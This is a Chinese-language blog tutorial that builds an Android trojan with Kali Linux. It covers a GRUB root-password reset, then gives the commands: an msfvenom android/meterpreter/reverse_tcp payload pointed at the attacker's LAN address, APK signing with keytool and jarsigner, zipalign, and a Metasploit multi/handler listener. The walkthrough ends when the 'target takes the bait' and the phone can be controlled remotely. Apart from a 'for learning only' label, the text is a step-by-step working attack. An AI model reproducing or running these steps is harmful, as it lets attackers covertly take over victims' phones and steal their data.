kalilinux生成安卓木马(仅供学习使用）

一、前期准备工作

1.1虚拟机安装好kalilinux

链接：https://pan.baidu.com/s/10rcLYOGYKQb0pETqJLbD4A
提取码：p4dq

（本身是想要给你们网站的但是那个包我找不到在哪下载的了，不想要网盘的可以去清华镜像/阿里镜像找找看）

上述是kalilinux的光盘镜像。

1.1.1kalilinux的安装

这个过程有点复杂，我之后再发博客详细讲解下kalilinux的安装。

1.1.2安装之后

打开虚拟机输入——root用户，密码

进入root账户下的系统

1.1.3注意：

kalilinux2020版本之后系统默认没有root用户都是普通用户，但是可以获得临时权限。

1.1.4更改root用户密码来实现永久进入超级管理员的系统中来

①开机选择第二项，点击回车进入图二界面

②点击键盘上的“E"，进入图三界面

③光标定位在图四的位置在“ro quiet splash”输入“init=/bin/bash”,并将“ro”修改成“rw"

④ 修改确认无误之后，按“F10”或者“Ctrl+C”“Ctrl+X”即可进入单用户模式(如图五所示)

⑤
**passwd 用户名，**这边修改的是root，所以输入“**passwd root”,**然后回车就可以输入新密码了，一共输入两次，密码不显示出来，输入完之后有，回车就完事了！

⑥重启即可

上述就是永久使用root用户的操作了，重启后用户名输入root，密码输入后登录就行了，后续操作就更加方便了。

2.1准备一台和电脑在同一局域网下的手机。（手机版本高于安卓8的话，想实现效果可以用电脑的安卓模拟器来实现，用linux来操作Windows电脑也行）

3.1下载xshell7

因为xshell6的破解版用不了了，必须使用xshell7才行，xshell7在各大软件商店均可下载。

二、进入正题

2.1进入kalilinux

鼠标右键打开终端

2.1.1获取当前系统所在局域网的ip地址

输入

$ifconfig

上图中 inet后面的就是本机目前linux系统的ip地址

我目前的ip地址是192.168.131.129

（读者可以看到自己的ip地址）

2.2创建木马

2.2.1输入下列命令：msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apk.apk

该命令会创建一个在根目录下的一个名为apk的apk文件。

其中的lhost是你的系统ip，lport是接口，在这里设置为5555。

2.3.为了木马的兼容性为其配置签名，并验证（我上述创建的是520.apk你们可以更改，我讲的是apk.apk）

2.3.1

keytool -genkey -V -keystore apk-trojan-key.keystore -alias apk -keyalg RSA -keysize 1024 -validity 999

输入上述命令之后

按照我的填写方式把每一步填好。

里面的密钥库口令自行设置！！！

2.3.2接下来

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore apk-trojan-key.keystore apk.apk apk

2.3.3验证证书

输入

jarsigner -verify -verbose apk.apk

到这步就成功一大半了

zipalign -v 4 520.apk aaaa.apk

2.3.4apt update——更新安装指令

等待更新结束。

2.3.5优化apk

先输入：apt install zipalign

再使用：zipalign -v 4 apk.apk aaaa.apk

结束后如图，优化成功。

2.4启动模块

2.4.1输入msfconsole

效果如图:

2.4.2加载模块

use exploit/multi/handler

2.4.3简略步骤了

set payload android/meterpreter/reverse_tcp //选择Payload

show options //查看参数设置

这个payload里边有两个参数要设置 LHOST和LPORT 表示地址和端口 默认的端口是4444

现在我们来更改设置：

1.set LHOST 192.168.131.129 //这里的地址设置成我们刚才生成木马的IP地址

2.set LPORT 5555 //这里的端口设置成刚才我们生成木马所监听的端口

3.exploit //开始执行漏洞 开始监听,等待手机上线

如图。

不要学我，我手快了，输错了几步。

2.5使用xshell7将木马传递给Windows再传给安卓。

利用xshell传文件

三、等待目标上钩

在这里我手机版本不对，但是电脑模拟器可以。

这表示目标上钩。

输入help可以查看你可以控制的操作。

到这步，试验成功。

总结，我的教学仅供大家学习使用，希望可以对kalilinux有一些心得。